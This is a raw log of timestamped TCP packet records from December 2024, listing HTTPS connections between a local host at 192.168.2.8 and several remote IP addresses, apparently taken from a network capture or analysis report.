                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.559194088 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.559278965 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.559341908 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.560276031 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.560296059 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.580950022 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581032991 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581115961 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581285954 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581325054 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594585896 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594630957 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594690084 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594887018 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594897985 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832545996 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832617044 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832700014 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832993031 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.833007097 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.120934010 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.121001005 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.121573925 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.121591091 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124057055 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124068022 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124155998 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124171019 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124183893 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124195099 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124284983 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124299049 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124306917 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124313116 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124322891 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124330997 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124581099 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124609947 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124819040 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124834061 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125075102 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125102997 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125123978 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125134945 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125247002 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125257969 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125399113 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125407934 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125425100 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125442982 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125458956 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125474930 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125524044 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125529051 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.146651030 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.149552107 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.149569988 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.150566101 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.150615931 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.151808023 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.180428982 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874095917 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874135971 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874237061 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874443054 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874452114 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420253992 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420322895 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420353889 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420377016 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.421282053 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.421304941 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.862999916 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863060951 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863254070 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863529921 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863547087 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.887010098 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.927376032 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008038998 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008146048 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008410931 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008630991 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008686066 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.191658974 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.191730976 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.191806078 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.192074060 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.192090034 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.208163023 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.208369017 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.208477020 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.209441900 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.209474087 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280364037 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280421972 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280955076 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280966043 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.282932043 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.282943964 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283032894 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283047915 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283056021 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283061028 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283092022 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283097029 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283196926 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283227921 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283409119 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283417940 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283442974 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283451080 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283457994 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283463001 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283471107 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283484936 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283494949 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283504963 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283555031 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283566952 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283606052 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283615112 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283632994 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283639908 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283644915 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283648014 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.074771881 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.076239109 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.076277971 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.076621056 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.086462975 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.086569071 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.128762960 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.402997017 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.403280020 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.403307915 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.403661966 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.404002905 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.404077053 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.415499926 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.415591002 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.416157007 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.416167974 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.418221951 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.418230057 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.659883976 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.659900904 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.659965038 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.659976959 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.660038948 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.660053015 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.660062075 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.660095930 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.660134077 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.660173893 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.707329988 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.707550049 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.707597971 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.707617044 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.707664013 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.707710028 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.751358032 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.751684904 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.752101898 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.752146959 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.752569914 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.752871990 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.780483007 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.780755997 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.780879021 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.780894995 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.780951977 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.781006098 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.781025887 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.781142950 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.781198025 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.827347040 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.827624083 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.827712059 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.827734947 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.827822924 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.827863932 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.875335932 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.890547037 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.890836000 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.890870094 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.890949011 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.899563074 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.899657011 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.899856091 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.899916887 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.900134087 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.900837898 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.901122093 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.936835051 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.936870098 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.936918974 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.936950922 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.936985970 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.937329054 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.947330952 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979330063 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979331970 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979526043 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979549885 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979615927 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979652882 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.979688883 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.009290934 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.009407997 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.009438992 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.009613037 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.010428905 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.010451078 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.011117935 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.011167049 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.011431932 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.012537956 CET49834443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.012552023 CET44349834116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.018918037 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019076109 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019104958 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019207954 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019222021 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019242048 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019248009 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019270897 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019299984 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019304991 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.019336939 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.149662018 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.149689913 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.149710894 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.149710894 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.149725914 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.149733067 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.186270952 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.186372042 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.190299988 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.190355062 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.190381050 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.190552950 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.190602064 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.190615892 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.215122938 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.215188026 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.215513945 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.215889931 CET49835443192.168.2.820.42.73.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.215907097 CET4434983520.42.73.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.235342026 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.235416889 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.257600069 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.257771969 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.257811069 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.257947922 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.259860039 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.259880066 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.259999990 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.260066986 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.260202885 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.265008926 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.265065908 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.265110016 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.268253088 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.291507959 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.291559935 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.293875933 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:27.293910980 CET44349830116.203.12.114192.168.2.8
